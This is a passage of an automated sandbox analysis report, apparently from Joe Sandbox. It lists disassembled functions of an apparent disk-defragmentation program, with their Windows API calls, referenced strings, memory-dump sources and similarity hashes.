                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: OpenService$CloseHandleManager
                                                                                                                                                                                                                                                                                                • String ID: 0N$VSS
                                                                                                                                                                                                                                                                                                • API String ID: 4136619037-702027763
                                                                                                                                                                                                                                                                                                • Opcode ID: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                                • Instruction ID: e3fabb29cb39525be17c5613465a7dd84fffe719b6809a75a20e2f83d6b45fa7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6631E932601314A7D610EBA8AC80FFB775DEB45365F84083FF904D2251DB19E98987EA
                                                                                                                                                                                                                                                                                                Function 004164C0 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 304windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetComboBoxInfo.USER32 ref: 00416520
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0041654D
                                                                                                                                                                                                                                                                                                • GetMapMode.GDI32(?,00000000), ref: 00416561
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041658E
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 004165AA
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004165D5
                                                                                                                                                                                                                                                                                                • OpenThemeData.UXTHEME(?,COMBOBOX,?,00FFFFFF,00000000,00000000), ref: 00416607
                                                                                                                                                                                                                                                                                                • DrawThemeBackground.UXTHEME(00000000,?,00000005,00000003,?,00000000), ref: 00416652
                                                                                                                                                                                                                                                                                                • DrawThemeBackground.UXTHEME(00000000,?,00000001,00000001,?,00000000), ref: 0041666C
                                                                                                                                                                                                                                                                                                • CloseThemeData.UXTHEME(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00416673
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041668C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004166A3
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 004167D1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416DD0: CopyRect.USER32(?,?), ref: 00416E1C
                                                                                                                                                                                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 0041681A
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0041683E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectTheme$MessageSend$BackgroundCompatibleCopyCreateDataDraw$BitmapClientCloseComboFrameInfoModeOpen
                                                                                                                                                                                                                                                                                                • String ID: 4$8F$COMBOBOX
                                                                                                                                                                                                                                                                                                • API String ID: 3327461832-961196532
                                                                                                                                                                                                                                                                                                • Opcode ID: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                                • Instruction ID: 20267cedc47a1196732836afe1a8f8ceed4fa11fcf58e3e8436092e3fc6905d6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BC138B1508300AFD314DF65C985FABB7E8BF88704F008A1EF58997291DB74E944CB96
                                                                                                                                                                                                                                                                                                Function 00432180 Relevance: 30.1, APIs: 4, Strings: 13, Instructions: 303windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,0000FFFE), ref: 00432329
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041D2E0: #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Optimize\OptimizeList,?,?,?,?,00427EC2,BB40E64E), ref: 0041D36A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041D2E0: #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D397
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,?), ref: 00432523
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402006$3402028$3402029$3402030$3402031$3402032$3402033$3402034$3402035$3402036$3402037$8F$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3242431549
                                                                                                                                                                                                                                                                                                • Opcode ID: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                                • Instruction ID: 1f5745e592a7c845df3e12826af7c739e18eef66d9bd278cacb692334ad6c886
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1A194B0B50301ABD310AF658D82FAE73A5AF48B04F10491FFA5EB76D1D7A8BD00965D
                                                                                                                                                                                                                                                                                                Function 00421750 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 306windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004217C5
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0042187C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 00421890
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004218A6
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 004218BC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00421580: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,004217B6,?,BB40E64E), ref: 004215AC
                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004218F0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CountRedrawTickWindow
                                                                                                                                                                                                                                                                                                • String ID: 3401097$8F$ScheduleStart$`=
                                                                                                                                                                                                                                                                                                • API String ID: 1016491994-1295084991
                                                                                                                                                                                                                                                                                                • Opcode ID: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                                • Instruction ID: a2f7d2ab4a79c621e2b3341a28b2bdd177a5bb8c7450e01432b01053e343f094
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FB117717003119BC720EF64DCC5FAA77A5AF94710F50493EF9099B2E1DB78A844CBAA
                                                                                                                                                                                                                                                                                                Function 00401570 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 273windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GdipGetImagePixelFormat.GDIPLUS(?,?), ref: 00401593
                                                                                                                                                                                                                                                                                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 004015F2
                                                                                                                                                                                                                                                                                                • GdipGetImageWidth.GDIPLUS(?,?,?,?,?,?), ref: 00401613
                                                                                                                                                                                                                                                                                                • GdipGetImagePaletteSize.GDIPLUS(?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040165A
                                                                                                                                                                                                                                                                                                • GdipGetImagePalette.GDIPLUS(?,00000008,?,80070057,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 004016CF
                                                                                                                                                                                                                                                                                                • GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040177B
                                                                                                                                                                                                                                                                                                • GdipBitmapUnlockBits.GDIPLUS(?,?,?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004017F1
                                                                                                                                                                                                                                                                                                • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00401817
                                                                                                                                                                                                                                                                                                • GdipGetImageGraphicsContext.GDIPLUS(?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?), ref: 0040182D
                                                                                                                                                                                                                                                                                                • GdipDrawImageI.GDIPLUS(00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?), ref: 00401840
                                                                                                                                                                                                                                                                                                • GdipDeleteGraphics.GDIPLUS(00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?), ref: 00401846
                                                                                                                                                                                                                                                                                                • GdipDisposeImage.GDIPLUS(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?), ref: 0040184C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Gdip$Image$Bitmap$BitsGraphicsPalette$ContextCreateDeleteDisposeDrawFormatFromHeightLockPixelScan0SizeUnlockWidth
                                                                                                                                                                                                                                                                                                • String ID: &$>=
                                                                                                                                                                                                                                                                                                • API String ID: 1279047860-1654677323
                                                                                                                                                                                                                                                                                                • Opcode ID: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                                • Instruction ID: 8a788743ff85fe53078408617ba339fa43619964413e8471535d34c3641ef31a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66A175B1E002059FDB14DF95D881AAFB7B5EF88304F14852EE919BB351D738E941CBA8
                                                                                                                                                                                                                                                                                                Function 004197C0 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 287comCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000,BB40E64E,00094658,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00419894
                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 004198B6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Uninitialize$BlanketCreateInitializeInstanceProxy
                                                                                                                                                                                                                                                                                                • String ID: Caption$SELECT * from Win32_Volume$WQL
                                                                                                                                                                                                                                                                                                • API String ID: 3575674281-2330458756
                                                                                                                                                                                                                                                                                                • Opcode ID: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
                                                                                                                                                                                                                                                                                                • Instruction ID: d51c13efc7a02c32f90284d818f56e509f551fc104d77d5da5b0aeb1152a1774
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10A189766083449FC300EF59C890A9BB7E9EF88354F10491EF44997360D779ED89CBA5
                                                                                                                                                                                                                                                                                                Function 00422450 Relevance: 22.7, APIs: 15, Instructions: 169windowtimeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(004216E9), ref: 00422459
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004224AE
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004224E0
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(004216E9,00000001,000003E8,00000000), ref: 0042250F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00422558
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008013,00000000), ref: 0042256D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00008007,00000000), ref: 00422582
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,0000800C,00000000), ref: 00422597
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(004216E9,00000064,00000064,00000000), ref: 004225A3
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Timer$Window
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 389327760-0
                                                                                                                                                                                                                                                                                                • Opcode ID: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                                • Instruction ID: a9acc03ce2714c2a1218ac3b36ef8cf29172f02598394e016a1efff805efb144
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C516170390B00ABE624EB75CC82FD6B395AF44B04F40851DB359AB2D1CBF6B8418B48
                                                                                                                                                                                                                                                                                                Function 0042C690 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0042C6CB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0042D010: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0042D041
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                                                                                                • String ID: 3401007$3401034$3401035$8<$DiskDefrag$Frame_Color$Mid_Back_Color$Text_Color$Window$Window_Back_Gray_Color
                                                                                                                                                                                                                                                                                                • API String ID: 909852535-1675042175
                                                                                                                                                                                                                                                                                                • Opcode ID: 52757a301fae08faaa59b090e491993efb51acdf8729a0a5be35b6fc276aefa4
                                                                                                                                                                                                                                                                                                • Instruction ID: 43899c4dce7d941302b132538349e8bcafe351e88f225ab48a7149cde0acca41
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52757a301fae08faaa59b090e491993efb51acdf8729a0a5be35b6fc276aefa4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD316F707907017BD260BAB58C43FEA76A4AF84B04F20891BB65EB75C1CAF874419B9C
                                                                                                                                                                                                                                                                                                Function 0041D2E0 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 203COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Optimize\OptimizeList,?,?,?,?,00427EC2,BB40E64E), ref: 0041D36A
                                                                                                                                                                                                                                                                                                • #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D397
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: *.avi,*.mpg,*.mpeg,*.mov,*.mkv,*.mp3,*.mp4,*.wmv$*.iso,*.bin$*.zip, *.rar$3403001$3403002$3403003$DiskDefrag\Setting Option\Optimize\OptimizeList$`=
                                                                                                                                                                                                                                                                                                • API String ID: 0-4238402903
                                                                                                                                                                                                                                                                                                • Opcode ID: be8af0238dc030f08aca80df25955cefc0936c7b45c5ded25a6e09dc14720ccf
